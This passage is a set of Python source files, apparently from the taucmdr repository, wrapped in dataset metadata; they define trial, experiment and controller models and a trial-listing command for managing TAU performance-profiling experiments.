except Exception as err:\n # Installation failed, clean up any failed install files\n shutil.rmtree(self.bfd_prefix, ignore_errors=True)\n raise error.SoftwarePackageError('BFD installation failed verification: %s' % err)\n else:\n return retval\n\n def applyCompiletimeConfig(self, opts, env):\n \"\"\"\n TODO: Docs\n \"\"\"\n env['PATH'] = os.pathsep.join([self.bin_path, env.get('PATH', '')])\n\n def getRuntimeConfig(self, opts, env):\n \"\"\"\n TODO: Docs\n \"\"\"\n pass\n\n \n" }, { "alpha_fraction": 0.6183245182037354, "alphanum_fraction": 0.6200307011604309, "avg_line_length": 29.685863494873047, "blob_id": "774d5db52c323bd86ded6d8a482f1cb017054311", "content_id": "ac005718579dc43ae97e773e62fcefe4edb46ef3", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 5861, "license_type": "permissive", "max_line_length": 91, "num_lines": 191, "path": "/packages/tau/model/trial.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n# System modules\nimport os\nimport sys\nimport glob\nimport shutil\nfrom datetime import datetime\n\n# TAU modules\nimport logger\nimport util\nimport storage\nimport controller as ctl\n\nLOGGER = logger.getLogger(__name__)\n\n\nclass Trial(ctl.Controller):\n \"\"\"\n Trial data model controller\n \"\"\"\n \n attributes = { \n 'number': {\n 'type': 'integer',\n 'required': True\n },\n 'experiment': {\n 'model': 'Experiment',\n 'required': True\n },\n 'command': {\n 'type': 'string',\n 'required': True\n },\n 'cwd': {\n 'type': 'string',\n 'required': True\n },\n 'environment': {\n 'type': 'string',\n 'required': True\n },\n 'begin_time': {\n 'type': 'datetime'\n },\n 'end_time': {\n 'type': 'datetime'\n },\n 'return_code': {\n 'type': 'integer'\n },\n 'data_size': {\n 'type': 'integer'\n }, \n }\n \n def prefix(self):\n \"\"\"\n Path to trial data\n \"\"\"\n experiment = self.populate('experiment')\n return os.path.join(experiment.prefix(), str(self['number']))\n \n def onCreate(self):\n \"\"\"\n Initialize trial data\n \"\"\"\n prefix = self.prefix()\n try:\n util.mkdirp(prefix)\n except Exception as err:\n raise error.ConfigurationError('Cannot create directory %r: %s' % (prefix, err), \n 'Check that you have `write` access')\n \n def onDelete(self):\n \"\"\"\n Clean up trial data\n \"\"\"\n prefix = self.prefix()\n try:\n shutil.rmtree(prefix)\n except Exception as err:\n if os.path.exists(prefix):\n LOGGER.error(\"Could not remove trial data at '%s': %s\" % (prefix, err))\n \n @classmethod\n def perform(cls, experiment, cmd, cwd, env):\n \"\"\"\n TODO: Docs\n \"\"\"\n def banner(mark, name, 
time):\n LOGGER.info('{:=<{}}'.format('== %s %s (%s) ==' %\n (mark, name, time), logger.LINE_WIDTH)) \n measurement = experiment.populate('measurement')\n cmd_str = ' '.join(cmd)\n begin_time = str(datetime.utcnow())\n \n trials = experiment.populate('trials')\n trial_number = None\n all_trial_numbers = sorted([trial['number'] for trial in trials])\n LOGGER.debug(\"Trial numbers: %s\" % all_trial_numbers)\n for i, ii in enumerate(all_trial_numbers):\n if i != ii:\n trial_number = i\n break\n if trial_number == None:\n trial_number = len(all_trial_numbers)\n LOGGER.debug(\"New trial number is %d\" % trial_number)\n \n fields = {'number': trial_number,\n 'experiment': experiment.eid,\n 'command': cmd_str,\n 'cwd': cwd,\n 'environment': 'FIXME',\n 'begin_time': begin_time}\n\n banner('BEGIN', experiment.name(), begin_time)\n trial = cls.create(fields)\n prefix = trial.prefix()\n try:\n retval = util.createSubprocess(cmd, cwd=cwd, env=env)\n if retval:\n LOGGER.warning(\"Nonzero return code '%d' from '%s'\" % (retval, cmd_str))\n else:\n LOGGER.info(\"'%s' returned 0\" % cmd_str)\n \n # Copy profile files to trial prefix\n if measurement['profile']:\n profiles = glob.glob(os.path.join(cwd, 'profile.*.*.*'))\n if not profiles:\n LOGGER.error(\"%s did not generate any profile files!\" % cmd_str)\n else:\n LOGGER.info(\"Found %d profile files. Adding to trial...\" % len(profiles))\n for file in profiles:\n shutil.move(file, prefix)\n LOGGER.debug(\"'%s' => '%s'\" % (file, prefix))\n \n # TODO: Handle traces\n \n end_time = str(datetime.utcnow())\n except:\n # Something went wrong so revert the trial\n LOGGER.error(\"Exception raised, reverting trial...\")\n cls.delete(eids=[trial.eid])\n raise\n else:\n # Trial successful, update record and record state for provenance\n data_size = sum(os.path.getsize(os.path.join(prefix, f)) for f in os.listdir(prefix))\n shutil.copy(storage.user_storage.dbfile, prefix)\n cls.update({'end_time': end_time, \n 'return_code': retval,\n 'data_size': data_size}, eids=[trial.eid])\n banner('END', experiment.name(), end_time)\n \n return retval\n" }, { "alpha_fraction": 0.6232876777648926, "alphanum_fraction": 0.6257464289665222, "avg_line_length": 32.48823547363281, "blob_id": "8a195fa057d9eeb5e12253f1a187a8a0af0a2936", "content_id": "58fbf28a6f4eb56684b1813a1912530db357fd06", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5694, "license_type": "permissive", "max_line_length": 105, "num_lines": 170, "path": "/packages/tau/commands/trial/list.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. 
nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nfrom texttable import Texttable\nfrom pprint import pformat\n\n# TAU modules\nimport tau\nimport logger\nimport commands\nimport error\nimport util\nimport arguments as args\nimport environment as env\nfrom model.experiment import Experiment\nfrom model.trial import Trial\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"List experiment trials.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s [trial_number] [trial_number] ... [arguments]\n %(command)s -h | --help\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\n_arguments = [(('numbers',), {'help': \"If given, show details for trial with this number\",\n 'metavar': 'trial_number', \n 'nargs': '*',\n 'default': args.SUPPRESS}),\n (('-l','--long'), {'help': \"Display all information about the trial\",\n 'action': 'store_true',\n 'default': False}),\n (('-s','--short'), {'help': \"Summarize trial information\",\n 'action': 'store_true',\n 'default': False})]\nPARSER = args.getParser(_arguments,\n prog=COMMAND, \n usage=USAGE, \n description=SHORT_DESCRIPTION)\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\" \n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n selection = Experiment.getSelected()\n if not selection:\n LOGGER.info(\"No experiment configured. See `tau project select`\\n\")\n return tau.EXIT_FAILURE\n \n long = args.long\n short = args.short\n if long and short:\n PARSER.error(\"Please specify either '--long' or '--short', not both\")\n \n try:\n numbers = [int(n) for n in args.numbers]\n except AttributeError:\n found = Trial.search({'experiment': selection.eid})\n except ValueError:\n PARSER.error(\"Invalid trial number\")\n else:\n found = []\n for num in numbers:\n t = Trial.search({'experiment': selection.eid, 'number': num})\n if t:\n found.extend(t)\n else:\n PARSER.error(\"No trial number %d in the current experiment\" % num)\n\n LOGGER.info('{:=<{}}'.format('== %s Trials ==' % selection.name(), logger.LINE_WIDTH) + '\\n')\n if not found:\n LOGGER.info(\"No trials. 
Use 'tau <command>' or 'tau trial create <command>' to create a new trial\\n\")\n return tau.EXIT_FAILURE\n \n table = Texttable(logger.LINE_WIDTH)\n cols = [('Number', 'c', 'number'),\n ('Data Size', 'c', 'data_size'), \n ('Command', 'l', 'command'), \n ('In Directory', 'l', 'cwd'),\n ('Began at', 'c', 'begin_time'),\n ('Ended at', 'c', 'end_time'),\n ('Return Code', 'c', 'return_code')]\n headers = [header for header, _, _ in cols]\n rows = [headers]\n if long:\n parts = []\n for t in found:\n parts.append(pformat(t.data))\n listing = '\\n'.join(parts)\n elif short:\n parts = []\n trials_by_cmd = {}\n for trial in found:\n trials_by_cmd.setdefault(trial['command'], []).append(trial)\n for key, val in trials_by_cmd.iteritems():\n count = len(val)\n data_size = util.humanReadableSize(sum([trial['data_size'] for trial in val]))\n if count == 1:\n msg = \" 1 trial of '%s' (%s).\" % (os.path.basename(key), data_size)\n else:\n msg = \" %d trials of '%s' (%s).\" % (len(val), os.path.basename(key), data_size)\n parts.append(msg + ' Use `tau trial list` to see details.')\n listing = '\\n'.join(parts) \n else:\n for t in found:\n row = [t.get(attr, '') for _, _, attr in cols if attr]\n row[1] = util.humanReadableSize(row[1])\n rows.append(row)\n table.set_cols_align([align for _, align, _ in cols])\n table.add_rows(rows)\n listing = table.draw()\n \n LOGGER.info('\\n'.join([listing, '']))\n return tau.EXIT_SUCCESS\n\n" }, { "alpha_fraction": 0.6117615699768066, "alphanum_fraction": 0.6127446889877319, "avg_line_length": 33.1128044128418, "blob_id": "9ae8eaddea70a6e7047896f43ef6e02acea8b9a3", "content_id": "997ab88218ada6c0344fb81aa7d3bd76e229583f", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11189, "license_type": "permissive", "max_line_length": 121, "num_lines": 328, "path": "/packages/tau/model/experiment.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport sys\nimport glob\nimport shutil\n\n# TAU modules\nimport logger\nimport settings\nimport error\nimport controller\nimport util\nimport environment\nimport cf.tau\nimport cf.pdt\nimport cf.bfd\nimport cf.libunwind\nfrom model.project import Project\nfrom model.target import Target\nfrom model.compiler import Compiler\nfrom model.trial import Trial\n\nLOGGER = logger.getLogger(__name__)\n\n\nclass Experiment(controller.Controller):\n \"\"\"\n Experiment data model controller\n \"\"\"\n \n attributes = {\n 'project': {\n 'model': 'Project',\n 'required': True,\n },\n 'target': {\n 'model': 'Target',\n 'required': True,\n },\n 'application': {\n 'model': 'Application',\n 'required': True,\n },\n 'measurement': {\n 'model': 'Measurement',\n 'required': True,\n },\n 'trials': {\n 'collection': 'Trial',\n 'via': 'experiment'\n },\n }\n \n def name(self):\n populated = self.populate()\n return '%s (%s, %s, %s)' % (populated['project']['name'],\n populated['target']['name'],\n populated['application']['name'],\n populated['measurement']['name'])\n\n def prefix(self):\n \"\"\"\n Storage location for all experiment data\n \"\"\"\n populated = self.populate()\n return os.path.join(populated['project'].prefix(),\n populated['target']['name'], \n populated['application']['name'], \n populated['measurement']['name'])\n\n def onCreate(self):\n \"\"\"\n Initialize experiment storage\n \"\"\"\n prefix = self.prefix()\n try:\n util.mkdirp(prefix)\n except:\n raise error.ConfigurationError('Cannot create directory %r' % prefix, \n 'Check that you have `write` access')\n\n def onDelete(self):\n \"\"\"\n Clean up experiment storage\n \"\"\"\n if self.isSelected():\n settings.unset('experiment_id')\n prefix = self.prefix()\n try:\n shutil.rmtree(prefix)\n except Exception as err:\n if os.path.exists(prefix):\n LOGGER.error(\"Could not remove experiment data at '%s': %s\" % (prefix, err))\n\n def select(self):\n if not self.eid:\n raise error.InternalError('Tried to select an experiment without an eid')\n settings.set('experiment_id', self.eid)\n \n def isSelected(self):\n if self.eid:\n return settings.get('experiment_id') == self.eid\n return False\n\n @classmethod\n def getSelected(cls):\n experiment_id = settings.get('experiment_id')\n if experiment_id:\n found = cls.one(eid=experiment_id)\n if not found:\n raise error.InternalError('Invalid experiment ID: %r' % experiment_id)\n return found\n return None\n\n def configure(self):\n \"\"\"\n Installs all software required to perform the experiment\n \"\"\"\n populated = self.populate()\n # TODO: Should install packages in a location where all projects can use\n prefix = populated['project']['prefix']\n target = populated['target'].populate()\n application = populated['application']\n measurement = populated['measurement']\n cc = target['CC']\n cxx = target['CXX']\n fc = target['FC']\n verbose = (logger.LOG_LEVEL == 'DEBUG')\n\n # Configure/build/install PDT if needed\n if not 
measurement['source_inst']:\n # source instrumentation is off, so TAU is built without PDT/BFD/libunwind\n self.pdt = pdt = None\n self.bfd = bfd = None\n self.libunwind = libunwind = None\n else:\n pdt = cf.pdt.Pdt(prefix, cxx, target['pdt_source'], target['host_arch'])\n pdt.install()\n self.pdt = pdt\n bfd = cf.bfd.Bfd(prefix, cxx, target['bfd_source'], target['host_arch'])\n bfd.install()\n self.bfd = bfd\n libunwind = cf.libunwind.Libunwind(prefix, cxx, target['libunwind_source'], target['host_arch'])\n libunwind.install()\n self.libunwind = libunwind\n\n # Configure/build/install TAU if needed\n tau = cf.tau.Tau(prefix, cc, cxx, fc, target['tau_source'], target['host_arch'],\n verbose=verbose,\n pdt=pdt,\n bfd=bfd, \n libunwind=libunwind, \n profile=measurement['profile'],\n trace=measurement['trace'],\n sample=measurement['sample'],\n source_inst=measurement['source_inst'],\n compiler_inst=measurement['compiler_inst'],\n # TODO: Library wrapping inst\n openmp_support=application['openmp'], \n openmp_measurements=measurement['openmp'],\n pthreads_support=application['pthreads'], \n pthreads_measurements=None, # TODO\n mpi_support=application['mpi'], \n mpi_measurements=measurement['mpi'],\n cuda_support=application['cuda'],\n cuda_measurements=None, # TODO\n shmem_support=application['shmem'],\n shmem_measurements=None, # TODO\n mpc_support=application['mpc'],\n mpc_measurements=None, # TODO\n memory_support=None, # TODO\n memory_measurements=None, # TODO\n callpath=measurement['callpath'])\n tau.install()\n self.tau = tau\n\n def managedBuild(self, compiler_cmd, compiler_args):\n \"\"\"\n TODO: Docs\n \"\"\"\n self.configure()\n target = self.populate('target')\n measurement = self.populate('measurement')\n given_compiler = Compiler.identify(compiler_cmd)\n target_compiler = Compiler.one(eid=target[given_compiler['role']])\n\n # Confirm target supports compiler\n if given_compiler.eid != target_compiler.eid:\n raise error.ConfigurationError(\"Target '%s' is configured with %s compiler '%s', not '%s'\" %\n (target['name'], given_compiler['language'], \n target_compiler.absolutePath(),\n given_compiler.absolutePath()),\n \"Use a different target or use compiler '%s'\" %\n target_compiler.absolutePath())\n\n # Build compile-time environment from component packages\n opts, env = environment.base()\n if measurement['source_inst']:\n self.pdt.applyCompiletimeConfig(opts, env)\n self.bfd.applyCompiletimeConfig(opts, env)\n self.tau.applyCompiletimeConfig(opts, env)\n\n use_wrapper = measurement['source_inst'] or measurement['compiler_inst'] != 'never'\n if use_wrapper:\n compiler_cmd = given_compiler['tau_wrapper']\n\n cmd = [compiler_cmd] + opts + compiler_args\n retval = util.createSubprocess(cmd, env=env)\n # This would work if TAU's wrapper scripts returned nonzero on error...\n# if retval == 0:\n# LOGGER.info(\"TAU has finished building the application. Now use `tau <command>` to gather data from <command>.\")\n# else:\n# LOGGER.warning(\"TAU was unable to build the application. You can see detailed output in '%s'\" % logger.LOG_FILE)\n return retval\n\n def managedRun(self, application_cmd, application_args):\n \"\"\"\n TODO: Docs\n \"\"\"\n self.configure()\n measurement = self.populate('measurement')\n \n command = util.which(application_cmd)\n if not command:\n raise error.ConfigurationError(\"Cannot find executable: %s\" % application_cmd)\n path = os.path.dirname(command)\n \n # Check for existing profile files\n if measurement['profile']:\n profiles = glob.glob(os.path.join(path, 'profile.*.*.*'))\n if len(profiles):\n 
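# profiles left over from an earlier run would be swept into the new trial's data (Trial.perform moves profile.* files into the trial prefix), so warn and delete them first\n 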
LOGGER.warning(\"Profile files found in '%s'! They will be deleted.\" % path)\n for file in profiles:\n try: os.remove(file)\n except: continue\n # Check for existing trace files\n # TODO\n\n # Build environment from component packages\n opts, env = environment.base()\n self.tau.applyRuntimeConfig(opts, env)\n \n # TODO : Select tau_exec as needed\n use_tau_exec = False\n if use_tau_exec:\n # TODO: tau_exec flags and command line args\n cmd = ['tau_exec'] + opts + [application_cmd]\n else:\n cmd = [application_cmd]\n cmd += application_args\n \n return Trial.perform(self, cmd, path, env)\n \n def show(self, trial_numbers=None):\n \"\"\"\n Show most recent trial or all trials with given numbers\n \"\"\"\n self.configure()\n if trial_numbers:\n trials = []\n for n in trial_numbers:\n t = Trial.one({'experiment': self.eid, 'number': n})\n if not t:\n raise error.ConfigurationError(\"No trial number %d in experiment %s\" % (n, self.name()))\n trials.append(t)\n else:\n all_trials = self.populate('trials')\n if not all_trials:\n trials = None\n else:\n latest_date = all_trials[0]['begin_time']\n latest_trial = all_trials[0]\n for trial in all_trials:\n if trial['begin_time'] > latest_date:\n latest_date = trial['begin_time']\n latest_trial = trial\n trials = [latest_trial]\n \n if not trials:\n raise error.ConfigurationError(\"No trials in experiment %s\" % self.name(),\n \"See `tau trial create --help`\")\n \n opts, env = environment.base()\n self.tau.applyRuntimeConfig(opts, env)\n\n for trial in trials:\n prefix = trial.prefix()\n profiles = glob.glob(os.path.join(prefix, 'profile.*.*.*'))\n if not profiles:\n profiles = glob.glob(os.path.join(prefix, 'MULTI__*'))\n if profiles:\n self.tau.showProfile(prefix)\n" }, { "alpha_fraction": 0.6270387172698975, "alphanum_fraction": 0.6278381943702698, "avg_line_length": 33.36263656616211, "blob_id": "311efb289be20da81e485d9be48cbf09beb016b1", "content_id": "fee3f33dfab4a40998d6fe41ff496bab8e71e878", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12508, "license_type": "permissive", "max_line_length": 98, "num_lines": 364, "path": "/packages/tau/controller.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport json\n\n# TAU modules\nimport logger\nimport error\nfrom storage import user_storage\n\n\nLOGGER = logger.getLogger(__name__)\n\n\nclass ModelError(error.InternalError):\n \"\"\"\n Indicates that invalid model data was given.\n \"\"\"\n def __init__(self, model_cls, value):\n super(ModelError, self).__init__(\"Error in model '%s':\\n%s\" % (model_cls.model_name, value))\n self.model_cls = model_cls\n\n\nclass UniqueAttributeError(ModelError):\n def __init__(self, model_cls, unique):\n super(UniqueAttributeError, self).__init__(\n model_cls, 'A record with one of %r already exists' % unique)\n\n\n\nclass Controller(object):\n \"\"\"\n The \"C\" in MVC\n \n Subclasses reside in the 'model' package and define a member dictionary \n 'attributes' that describes the data model in the form:\n <attribute>: {\n property: value, \n [[property: value], ...]\n }\n \n The 'model' package initializes the set 'references' in each class\n to describe one-sided relationships, e.g.\n Model_A:\n attr_x: { 'model': 'Model_C' }\n Model_B:\n attr_y: { 'model': 'Model_C' }\n Model_C:\n references = set( (Model_A, 'attr_x'), (Model_B, 'attr_y') )\n\n The 'model' package also initializes the dictionary 'associations' in \n each class to describe two-sided relationships, e.g.\n Model_A:\n attr_x: {\n model: Model_B\n via: attr_k\n }\n associations = {attr_x: (Model_B, attr_k)}\n Model_B:\n attr_k: {\n model: Model_A\n }\n associations = {attr_k: (Model_A, attr_x)}\n \"\"\"\n \n # Subclasses override for callback\n def onCreate(self): pass\n def onUpdate(self): pass\n def onDelete(self): pass\n \n def __init__(self, fields):\n self.eid = getattr(fields, 'eid', None)\n self.data = self._validate(fields)\n self.populated = None\n\n def __getitem__(self, key):\n return self.data[key]\n \n def get(self, key, default=None):\n return self.data.get(key, default)\n\n def __repr__(self):\n return json.dumps(repr(self.data))\n\n @classmethod\n def _validate(cls, data, enforce_schema=True):\n \"\"\"\n Validates the given data against the model schema\n \"\"\"\n if data is None:\n return None\n if enforce_schema:\n for key in data:\n if not key in cls.attributes:\n raise ModelError(cls, \"Model '%s' has no attribute named '%s'\" % (cls.model_name, key))\n validated = {}\n for attr, props in cls.attributes.iteritems():\n #\n # TODO: Check types\n #\n # Check required fields and defaults\n try:\n validated[attr] = data[attr]\n except KeyError:\n if 'required' in props:\n raise ModelError(cls, \"'%s' is required but was not defined\" % attr)\n elif 'defaultsTo' in props:\n validated[attr] = props['defaultsTo']\n # Check collections\n if 'collection' in props:\n value = data.get(attr, [])\n if not value:\n value = []\n elif not isinstance(value, list):\n raise ModelError(cls, \"Value supplied for '%s' is not a list: %r\" % (attr, value))\n else:\n for id in value:\n try:\n int(id)\n except ValueError:\n raise ModelError(cls, \"Invalid non-integer ID '%s' in '%s'\" % (id, attr))\n 
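# store the normalized list (a falsy value was coerced to an empty list above) once every element parses as an integer ID\n 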
validated[attr] = value\n # Check model associations\n elif 'model' in props:\n value = data.get(attr, None)\n if value is not None:\n try:\n if int(value) != value:\n raise ValueError\n except ValueError:\n raise ModelError(cls, \"Invalid non-integer ID '%s' in '%s'\" % (value, attr))\n validated[attr] = value\n return validated\n \n def populate(self, attribute=None):\n \"\"\"\n Translates model id numbers in `self` to model controllers and \n returns all data as a dictionary\n \"\"\"\n from tau.model import MODELS\n LOGGER.debug('Populating %r' % self)\n if not self.populated:\n self.populated = dict(self.data)\n for attr, props in self.attributes.iteritems():\n try:\n foreign_model = MODELS[props['model']]\n except KeyError:\n try:\n foreign_model = MODELS[props['collection']]\n except KeyError:\n continue\n else:\n self.populated[attr] = foreign_model.search(eids=self.data[attr])\n else:\n self.populated[attr] = foreign_model.one(eid=self.data[attr])\n if attribute:\n return self.populated[attribute]\n else:\n return self.populated\n \n @classmethod\n def one(cls, keys=None, eid=None):\n \"\"\"\n Return a single record matching all of 'keys' or element id 'eid'\n \"\"\"\n LOGGER.debug(\"Searching '%s' for keys=%r, eid=%r\" % (cls.model_name, keys, eid))\n found = user_storage.get(cls.model_name, keys=keys, eid=eid)\n return cls(found) if found else None\n \n @classmethod\n def all(cls):\n \"\"\"\n Return a list of all records\n \"\"\"\n return [cls(result) for result in user_storage.search(cls.model_name)]\n\n @classmethod\n def search(cls, keys=None, eids=None):\n \"\"\"\n Return a list of records matching all of 'keys' or element id 'eid'\n \"\"\"\n if eids is not None:\n if isinstance(eids, list):\n return [cls.one(eid=id) for id in eids]\n else:\n return [cls.one(eid=eids)]\n elif keys:\n return [cls(record) for record in user_storage.search(cls.model_name, keys=keys)]\n else:\n return cls.all()\n \n @classmethod\n def match(cls, field, regex=None, test=None):\n \"\"\"\n Return a list of records with 'field' matching 'regex' or 'test'\n \"\"\"\n return [cls(record) for record in user_storage.match(cls.model_name, field, regex, test)]\n \n @classmethod\n def exists(cls, keys=None, eids=None):\n \"\"\"\n Return true if a record matching the given keys exists\n \"\"\"\n return user_storage.contains(cls.model_name, keys=keys, eids=eids)\n \n @classmethod\n def create(cls, fields):\n \"\"\"\n Store a new model record and update associations\n \"\"\"\n model = cls(fields)\n unique = dict([(attr, model[attr])\n for attr, props in cls.attributes.iteritems()\n if 'unique' in props])\n if user_storage.contains(cls.model_name, keys=unique, any=True):\n raise UniqueAttributeError(cls, unique)\n with user_storage as storage:\n model.eid = storage.insert(cls.model_name, model.data)\n for attr, foreign in cls.associations.iteritems():\n foreign_model, via = foreign\n if 'model' in model.attributes[attr]:\n foreign_keys = [model.data[attr]]\n elif 'collection' in model.attributes[attr]:\n foreign_keys = model.data[attr]\n model._addTo(foreign_model, foreign_keys, via)\n model.onCreate()\n return model\n \n @classmethod\n def update(cls, fields, keys=None, eids=None):\n \"\"\"\n Change the fields of all records that match the given keys\n and update associations\n \"\"\"\n if eids is not None:\n changing = cls.search(eids=eids)\n elif keys is not None:\n changing = cls.search(keys)\n else:\n raise error.InternalError('Controller.update() 